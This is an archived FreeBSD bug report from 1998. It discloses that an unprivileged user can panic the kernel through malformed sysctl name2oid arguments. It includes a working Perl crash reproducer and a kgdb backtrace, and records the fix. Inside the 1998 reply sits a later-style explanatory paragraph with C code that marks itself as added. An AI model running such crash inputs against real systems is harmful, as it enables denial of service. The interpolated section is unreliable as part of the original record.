From nobody  Mon Dec 28 06:07:20 1998
Received: (from nobody@localhost)
          by hub.freebsd.org (8.8.8/8.8.8) id GAA03719;
          Mon, 28 Dec 1998 06:07:20 -0800 (PST)
          (envelope-from nobody)
Message-Id: <199812281407.GAA03719@hub.freebsd.org>
Date: Mon, 28 Dec 1998 06:07:20 -0800 (PST)
From: gary@hotlava.com
To: freebsd-gnats-submit@freebsd.org
Subject: sysctl crashes system with bad args
X-Send-Pr-Version: www-1.0

>Number:         9218
>Category:       kern
>Synopsis:       sysctl crashes system with bad args
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    phk
>State:          closed
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Mon Dec 28 06:10:00 PST 1998
>Closed-Date:    Tue Mar 23 15:15:35 PST 1999
>Last-Modified:  Tue Mar 23 15:17:50 PST 1999
>Originator:     Gary Howland
>Release:        3.0 RELEASE
>Organization:
Hotlava Consulting
>Environment:
3.0 RELEASE
>Description:
The sysctl() call crashes my i386 FreeBSD 3.0-RELEASE machine if
given certain parameters.  I am attempting to do a name2oid using
an OID of 0,3, and since I am doing it from perl, I am using the
syscall() interface with an initial argument of 202 in order to
invoke sysctl.  I am also *not* uid 0.

My args to sysctl appear to be reasonable, but I can't really be
sure what perl is doing with them - could the syscall perhaps be
getting in the way?

Anyway, my args are 202 for sysctl, [0,3] & 2 for the MIB args,
char[56] (all null) and &i (where i == 56) for the next two args,
and "kern.hostname" and &j (where j == 13) for the last two args.

It looks like some sort of problem with name2oid in kern_sysctl.c
(while typing this I've just realised I should try explicitly null
terminating the perl string, to see if that could be the cause of
the problem).  I would have tracked this problem down myself, but
after a couple of hours pissing about with sysctl code, and not
being able to make head nor tail of it, I've given in and am handing
it over to those who know more.  Obviously I would have sooner
posted the fix, rather than the problem, but at least I didn't post
the easy-to-run perl exploit :-)

I can provide the perl code that calls sysctl with the arguments
I described to those who will be working on the problem - just let
me know if you need it.  I don't normally withhold exploits (and
will post it to bugtraq myself if not there in a couple of weeks),
but I do want to give the bug hunters a head start.

I have no idea if this bug can be used to gain privileges, but it
would be interesting to find out.

>How-To-Repeat:
#!/usr/bin/perl -w

# sysctl(2) is syscall number 202 on FreeBSD 3.0/i386.  perl's syscall()
# passes string arguments as pointers and numeric arguments as integers.
sub sysctl { syscall(202, @_) }

my $oid = "\0" x 56;            # 56-byte zeroed output buffer for the oid (char[56], all null)
my $oid_len = pack("L", 56);    # packed, so passed by reference: size_t *oldlenp

my $mib = pack("LL", 0, 3);     # Undocumented: {0,3} is the name2oid node
my $name = "kern.hostname";
my $len = pack("L", length $name);  # packed as well, so perl passes a pointer where
                                    # sysctl expects the newlen integer itself (compare
                                    # new=0x804de50 with newlen=134536816 in the crashdump)

sysctl($mib, ((length $mib)/4), $oid, $oid_len, $name, $len) && die "Sysctl failed ($!)\n";


>Fix:
Not known - would have done if docs were better!!!

>Release-Note:
>Audit-Trail:

From: Kris Kennaway <kkennawa@physics.adelaide.edu.au>
To: freebsd-gnats-submit@freebsd.org, gary@hotlava.com
Cc:
Subject: Re: kern/9218: sysctl crashes system with bad args
Date: Wed, 30 Dec 1998 15:49:45 +1030 (CST)

 For kicks, I tried this as an unprivileged user, and got the following
 crashdump:
 
 Script started on Tue Dec 29 19:52:22 1998
 GDB is free software and you are welcome to distribute copies of it
  under certain conditions; type "show copying" to see the conditions.
 There is absolutely no warranty for GDB; type "show warranty" for details.
 GDB 4.16 (i386-unknown-freebsd), Copyright 1996 Free Software Foundation, Inc.
 (kgdb) symbol-file kernel
 Reading symbols from kernel...done.
 (kgdb) exec-file /var/crash/kernel.1
 (kgdb) core-file /var/crash/vmcore.1
 IdlePTD 2756608
 initial pcb at 23eb90
 panicstr: kmem_malloc(134537216): kmem_map too small: 3780608 total allocated
 panic messages:
 ---
 panic: kmem_malloc(134537216): kmem_map too small: 3780608 total allocated
 
 syncing disks... 8 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 giving up
 
 dumping to dev 30001, offset 2240
 dump 41 40 39 38 37 36 35 34 33 32 31 30 29 28 27 26 25 24 23 22 21 20 19 18
 17 
 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 
 ---
 #0  boot (howto=256) at ../../kern/kern_shutdown.c:285
 ../../kern/kern_shutdown.c:285: No such file or directory.
 (kgdb) where
 #0  boot (howto=256) at ../../kern/kern_shutdown.c:285
 #1  0xf012e13d in panic (
     fmt=0xf021d38a "kmem_malloc(%d): kmem_map too small: %d total allocated")
     at ../../kern/kern_shutdown.c:446
 #2  0xf01cc535 in kmem_malloc (map=0xf0246a90, size=134537216, waitflag=0)
     at ../../vm/vm_kern.c:301
 #3  0xf012ae82 in malloc (size=134536817, type=0xf022dd4c, flags=0)
     at ../../kern/kern_malloc.c:151
 #4  0xf013194a in sysctl_sysctl_name2oid (oidp=0xf022de04, arg1=0x0, arg2=0, 
     req=0xf3893e8c) at ../../kern/kern_sysctl.c:423
 #5  0xf0131374 in sysctl_root (oidp=0x0, arg1=0xf3893f18, arg2=2, 
     req=0xf3893e8c) at ../../kern/kern_sysctl.c:795
 #6  0xf0131526 in userland_sysctl (p=0xf37a3f00, name=0xf3893f18, namelen=2, 
     old=0x8056f00, oldlenp=0x804ddb0, inkernel=0, new=0x804de50, 
     newlen=134536816, retval=0xf3893f14) at ../../kern/kern_sysctl.c:890
 #7  0xf01313d6 in __sysctl (p=0xf37a3f00, uap=0xf3893f84)
     at ../../kern/kern_sysctl.c:826
 #8  0xf01e7ae4 in syscall (frame={tf_es = 39, tf_ds = 39, tf_edi = 134549536, 
       tf_esi = 7, tf_ebp = -272639632, tf_isp = -209109036, 
       tf_ebx = 672029128, tf_edx = 671594204, tf_ecx = 671594237, 
       tf_eax = 202, tf_trapno = 12, tf_err = 2, tf_eip = 672268865, 
       tf_cs = 31, tf_eflags = 530, tf_esp = -272639792, tf_ss = 39})
     at ../../i386/i386/trap.c:1064
 #9  0xf01dbfdc in Xint0x80_syscall ()
 ---Type <return> to continue, or q <return> to quit---
 #10 0x28068c59 in ?? ()
 #11 0x280d134f in ?? ()
 #12 0x8048d8d in ?? ()
 #13 0x8048cb4 in ?? ()
 (kgdb) 
 Script done on Tue Dec 29 19:53:13 1998
 
 Hope this helps someone.
 
 Kris
 
 -----
 (ASP) Microsoft Corporation (MSFT) announced today that the release of its 
 productivity suite, Office 2000, will be delayed until the first quarter
 of 1901.
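The backtrace above shows the user-supplied newlen (134536816) reaching malloc() unchanged from sysctl_sysctl_name2oid, which is what kmem_malloc panics on. The following user-space model is an added example, not FreeBSD's kern_sysctl.c and not the fix committed in revision 1.85; it contrasts the unchecked allocation with a bounded version. The field names follow the backtrace, and the MAX_NAME limit is an assumed value.

```c
/* Added example (not FreeBSD's code): a user-space model of the sysctl
 * name2oid handler from the PR's backtrace, showing why an unchecked
 * req->newlen reaches malloc() and what a bounded version looks like.
 * Field names follow the backtrace; the limit MAX_NAME is an assumption. */
#include <errno.h>
#include <stdlib.h>
#include <string.h>

#define MAX_NAME 256   /* assumed upper bound on a sysctl name such as "kern.hostname" */

struct sysctl_req {           /* mirrors the userland_sysctl() arguments in the trace */
    const void *newptr;       /* user buffer holding the name to look up */
    size_t      newlen;       /* caller-supplied length: 134536816 in the crashdump */
};

/* Unchecked form: the allocation size comes straight from the caller.
 * Returns the size that would be requested from the allocator. */
size_t name2oid_alloc_size_unchecked(const struct sysctl_req *req)
{
    return req->newlen + 1;   /* matches malloc(size=134536817) in frame #3 */
}

/* Hardened form: reject the request before any allocation if the length
 * is implausible.  Returns 0 and fills *name on success, else an errno value. */
int name2oid_checked(const struct sysctl_req *req, char *name, size_t namesz)
{
    if (req->newptr == NULL || req->newlen == 0)
        return EINVAL;
    if (req->newlen >= MAX_NAME || req->newlen >= namesz)
        return ENAMETOOLONG;          /* refuse instead of allocating it */
    memcpy(name, req->newptr, req->newlen);
    name[req->newlen] = '\0';         /* explicit terminator; user data need not have one */
    return 0;
}
```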
 
State-Changed-From-To: open->closed
State-Changed-By: sheldonh
State-Changed-When: Tue Mar 23 15:15:35 PST 1999
State-Changed-Why:
Fixed in src/sys/kern/kern_sysctl.c revision 1.85.
His commit.


Responsible-Changed-From-To: freebsd-bugs->phk
Responsible-Changed-By: sheldonh
Responsible-Changed-When: Tue Mar 23 15:15:35 PST 1999
Responsible-Changed-Why:
His commit.
>Unformatted:
